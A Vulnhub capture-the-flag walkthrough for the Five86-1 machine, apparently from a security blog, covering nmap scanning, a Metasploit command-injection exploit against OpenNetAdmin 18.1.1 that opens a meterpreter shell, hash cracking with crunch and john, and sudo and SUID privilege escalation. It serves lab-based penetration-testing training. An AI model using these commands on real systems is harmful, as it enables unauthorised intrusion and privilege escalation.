CTF Challenges

Five86:1 Vulnhub Walkthrough

Today we are sharing another CTF walkthrough of the vulnhub machine named Five86-1 with the intent of gaining experience in the world of penetration testing. The credit goes to m0tl3ycr3w for design this machine and the level is set to beginner to advanced.

According to the author: The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Download it from here: https://www.vulnhub.com/entry/five86-1,417/

Penetration Testing Methodologies

Network scanning

  • Netdiscover
  • Nmap

Enumeration

  • Exploring Http services

Exploit OpenNetAdmin

  • Command Injection (Metasploit)
  • Crack the hashes (john)

Privilege Escalation

  • Abusing Sudo
  • Abusing SUID

Walkthrough

Network Scanning

As you know, this is the initial phase where we used netdiscover for network scan for identifying host IP and this we have 192.168.0.126 as our host IP.

 

In our next step, we love to use nmap for network ports enumeration, thus we run the following command and found port 80 is open for HTTP, moreover, we also found robots.txt displaying disallow entry for /ona as shown in the below image.

Enumeration

Thus, we navigate to a web browser and browse the following URL and found open network admin application is running on the webserver and disclosing application installed version.

http://192.168.0.126/ona

As we notice that the openNetAdmin 18.1.1 version is installed on the host machine, so we explored for its exploit and found ruby script for Metasploit available to Exploit DB to abuse OpenNetAdmin against command injection. Without wasting time, we download a malicious file from our local machine.

Further, we copied the download ruby inside the Metasploit framework to use the module for exploit the host machine against its vulnerability.

Exploit

After copying the exploit inside Metasploit Framework, you will need to reload the database and load the module.

Here we got our meterpreter session after running the following commands:

use exploit 47772
set rhosts 192.168.0.126
set lhost 192.168.0.132
exploit

So, we successfully exploited the host machine and spawned the shell as www-data, we decided to go with post enumeration for privilege escalation and as a result, we found the “.htaccess” file from within /var/www/html/reports. By reading the .htaccess we found path for .htpasswd file i.e. “/var/www/.htpasswd” , and by reading .htapasswd file we found hashes for user “douglas”. In the .htapsswd file, the author has left a hint for the password as shown in the image.

So, we found that the password is a 10-character “aefhrt” string, so you’ll need to prepare a 10-character long password dictionary. Here we use crunch to create the dictionary and execute the following command to follow the pattern of the password as the author has said.

crunch 10 10 aefhrt > dict.txt

With the help of the above command, we generated a dictionary and used the john ripper to crack the hash value. Here I saved the hash value described above in a text file called “hash” and used dict.txt wordlist to crack the hash value and run the following command.

john --wordlist=/root/dict.txt hash

As a result, we found the password: “fatherrrrr” for the given hash value.

Privilege Escalation

As we spawned the host machine shell, we try to switch as Douglas by using the password cracked above. When we signed in as Douglass, we searched for the sudo rights for him and found that he could use the copy program as “jen.”

Since the author has given sudo right on copy program which could be executed as jen hence we can copy the ssh public rsa_key of douglas inside /home/jen/.ssh so that we can be logged as jen. Thus, we executed the following commands as given below.

cat id_rsa.pub > /tmp/authorized_keys
cd /tmp
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh

Now copy id_rsa in the /tmp directory and change the permission then try to access ssh shell on localhost as jen.

cd .ssh
cp id_rsa /tmp
cd /tmp
chmod 600 id_rsa
ssh -i id_rsa jen@127.0.0.1

Hmmm! As we connected to the ssh shell as jen we found another hint “you have a new mail” on the ssh banner as shown in the given image.

So, we find a text file “jen” in / var/mails that shows a jen email. As per this message, jen knows the password for the Moss account, so we can use the Moss credential for a further move.

So, switched from Jen’s account to Moss and identified for SUID enabled directories, luckily here we found that the sticky bit is enabled for “upyourgame” as shown in the image.

find / -perm -u=s -type f 2>/dev/null
cd .game
./upyourgame

So we navigate to /home/Moss/.game/ and run the “upyourgame” program, the program launches questionnaires that are only answerable in the YES / NO format, and finally, we get the root shell and find the final flag in the /root directory as shown below.

Author: Shubham Sharma is a Pentester, Cybersecurity Researcher and Enthusiast, contact here.